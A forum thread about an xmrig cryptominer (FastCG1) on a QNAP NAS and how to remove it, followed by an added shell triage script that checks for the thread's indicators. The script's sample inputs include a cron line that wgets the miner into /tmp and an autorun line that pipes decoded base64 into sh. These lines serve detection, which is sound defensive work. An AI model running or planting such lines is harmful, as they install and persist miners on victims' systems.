FastCG1 - Virus?
-
- Starting out
- Posts: 10
- Joined: Sun Feb 18, 2018 5:03 pm
FastCG1 - Virus?
Hi,
I have noticed my Qnap TS-453A NAS getting really slow.
I found a process named FastCG1 which had 100% processor and memory usage. Killed it via SSH but it always came back.
I decided to upgrade the firmware but I had to kill this process because the NAS would not restart because of the high processor usage. During this I noticed a wget request, see attached. Checked this site and I am not sure this is a system file.
The downloaded file is attached as a zip, but the ".zip" was just added by me because it would not let me upload it otherwise. The original file is xmrig.x86_64
What do you think?
-
- Experience counts
- Posts: 2415
- Joined: Wed Jan 08, 2014 10:34 pm
Re: FastCG1 - Virus?
The file appears to be a crypto-currency miner.
"Checked this site and I am not sure this is a system file."
https://www.google.co.uk/search?q=xmrig.x86_64
TS-431+ for storage and media and a bunch of IP cams under Surveillance Station. TVS-473 as files backup and QVR Pro.
-
- Starting out
- Posts: 10
- Joined: Sun Feb 18, 2018 5:03 pm
Re: FastCG1 - Virus?
Ahh yes, you are right.
How can I kill this? If I kill the process, it comes back in a few secs.
- dolbyman
- Guru
- Posts: 35268
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: FastCG1 - Virus?
Kill your NAS (you have no idea where and what has been compromised)
Start it from scratch
Never ever expose it again to WAN
You could also open a ticket with QNAP so they can update Malware Remover based on your case.
Last edited by dolbyman on Mon Oct 18, 2021 8:53 pm, edited 1 time in total.
-
- Starting out
- Posts: 10
- Joined: Sun Feb 18, 2018 5:03 pm
Re: FastCG1 - Virus?
Thanks for info,
Killed the processes continuously; it appeared in Browser Station, then App Center, then Container Station.
Killed all cron processes and now it looks ok. Updated the malware scan; since then nothing happens.
Unfortunately MalwareRemover has no logs...
I have used this as a VPN server and web server for years. Sometimes I had a few issues but those were solved more easily than this.
Ticket opened.
-
- Starting out
- Posts: 10
- Joined: Sun Feb 18, 2018 5:03 pm
Re: FastCG1 - Virus?
It looks like the issue is solved for now:
- WAN disabled
- /usr/bin/FastCG1 -> Deleted
- /user/bin/config.json -> Deleted
- /tmp -> Deleted all files
Opened ports limited to specific IPs in the firewall.
-
- New here
- Posts: 5
- Joined: Tue Nov 09, 2021 4:19 am
Re: FastCG1 - Virus?
Hello,
I am having this same issue, I was wondering if it came back for you. I did what you tried. It did remove it and stop it but after a server restart it comes back.
Thanks for any info.
- dolbyman
- Guru
- Posts: 35268
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: FastCG1 - Virus?
Did you read my posting about killing the NAS ?
-
- New here
- Posts: 5
- Joined: Tue Nov 09, 2021 4:19 am
Re: FastCG1 - Virus?
That's not really an option at this stage, as we try to gather some of the important data and other functions of our system. I was more curious if Deakgyuri saw it return after a restart? I want to work with QNAP more on this to update the malware tool with some of my info. I am curious how this forum topic is the only info on this threat; it looks really new from what I can find.
Thanks again.
- dolbyman
- Guru
- Posts: 35268
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: FastCG1 - Virus?
Probably limited to a specific kind of vulnerability (outdated WordPress or phpMyAdmin running on the NAS).
So did you contact QNAP already (if you want to work with them ..)?
On top, you have no idea what this malware does next; it could sideload ransomware and then all your (apparently business) data is gone.
-
- New here
- Posts: 5
- Joined: Tue Nov 09, 2021 4:19 am
Re: FastCG1 - Virus?
I have contacted them but no response as of yet. It does use phpMyAdmin for an internal website.
I am not too worried about the ransomware due to our backup strategy. I'm more trying to keep it going until an out-of-business day so I can do more to remedy the issue.
Do you think just a factory reset on the system, but leaving the data intact, would be enough? Or recover data from an older backup and lose about 3-4 days of work.
- dolbyman
- Guru
- Posts: 35268
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: FastCG1 - Virus?
I would kill each drive with diskpart (the OS is on the drives) and then restore the files from your most recent backups. Also take a peek at your autorun.sh (malware likes to add encrypted stuff in there to bootstrap itself even after a reset).
https://wiki.qnap.com/wiki/Running_Your ... at_Startup
-
- New here
- Posts: 5
- Joined: Tue Nov 09, 2021 4:19 am
Re: FastCG1 - Virus?
From what I can see autorun.sh is not enabled and the file is empty. As soon as I started updating three of my apps in the App Center, the process Fastcg1 started running again under the process of whatever app was updating. So it looks like it waits until something installs or updates or checks for updates, then runs.
-
- New here
- Posts: 5
- Joined: Tue Nov 09, 2021 4:19 am
Re: FastCG1 - Virus?
This is what I get looking at the conf folder. I don't see anything unless I am missing something.
-
- Starting out
- Posts: 10
- Joined: Sun Feb 18, 2018 5:03 pm
Re: FastCG1 - Virus?
Sorry, I did not read the post because I did not see that process, and QNAP finally contacted me, then they did nothing but delete FastCG1.
Today I noticed the XMRig again. I have no idea where it came from.
I did start the program; now I can see they are coming from 8.214.124.124:17777
Actually I am making another backup, then I will delete the whole OS.
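The checks this thread converges on (the respawning FastCG1/xmrig process, cron entries that refetch it into /tmp, dolbyman's advice to inspect autorun.sh, and the outbound connection to 8.214.124.124:17777 reported in the last post) gathered into one added triage script, written as an example here and not code from QNAP or from anyone in the thread. The SAMPLE_* inputs and PLACEHOLDER-HOST are constructed so it runs offline; it only reports findings and deletes nothing.

```shell
#!/bin/sh
# Added triage helper for the indicators this thread reports; it is not
# code from QNAP or from any poster. Each function reads captured command
# output on stdin and prints matching lines, so it can be fed the real
# `ps -eo pid,args`, `crontab -l`, `netstat -tn` output and autorun.sh on a
# NAS, or, as here, the constructed SAMPLE_* text for an offline check.

MINER_RE='FastCG1|xmrig'          # process/file names named in the thread
POOL_ADDR='8.214.124.124:17777'   # pool address reported by Deakgyuri

# PIDs of processes whose command line names the miner (input: ps -eo pid,args).
find_miner_pids() {
    grep -E "$MINER_RE" | awk '{print $1}'
}

# Non-comment cron lines that fetch or launch the miner (input: crontab -l).
find_cron_persistence() {
    grep -Ev '^[[:space:]]*#' | grep -E "wget|$MINER_RE|config\.json|/tmp/"
}

# Established connections to the reported pool (input: netstat -tn).
find_pool_connections() {
    grep -F "$POOL_ADDR" | grep -F ESTABLISHED
}

# autorun.sh is empty on a clean NAS: exit 0 if it carries any non-comment line.
autorun_suspicious() {
    grep -Eq '^[[:space:]]*[^#[:space:]]'
}

# Constructed samples (PLACEHOLDER-HOST stands in for the unnamed download site).
SAMPLE_PS='  512 /sbin/cron
 2213 /usr/bin/FastCG1 -c /usr/bin/config.json
 2380 /usr/local/apache/bin/httpd'
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /share/scripts/backup.sh
*/5 * * * * wget -q -O /tmp/xmrig.x86_64 http://PLACEHOLDER-HOST/xmrig.x86_64'
SAMPLE_NETSTAT='tcp 0 0 192.168.1.20:44122 8.214.124.124:17777 ESTABLISHED
tcp 0 0 192.168.1.20:443 192.168.1.10:51234 ESTABLISHED'
SAMPLE_AUTORUN='#!/bin/sh
echo cGxhY2Vob2xkZXI= | base64 -d | sh'

# Run with the argument "demo" to print what each check finds in the samples.
if [ "${1:-}" = "demo" ]; then
    printf 'miner pids:\n%s\n' "$(printf '%s\n' "$SAMPLE_PS" | find_miner_pids)"
    printf 'cron:\n%s\n' "$(printf '%s\n' "$SAMPLE_CRON" | find_cron_persistence)"
    printf 'pool:\n%s\n' "$(printf '%s\n' "$SAMPLE_NETSTAT" | find_pool_connections)"
    printf '%s\n' "$SAMPLE_AUTORUN" | autorun_suspicious && echo 'autorun.sh: suspicious'
fi
```

A hit from any of these checks supports the advice given in the thread: treat the NAS as compromised and rebuild it from backups rather than deleting files by hand.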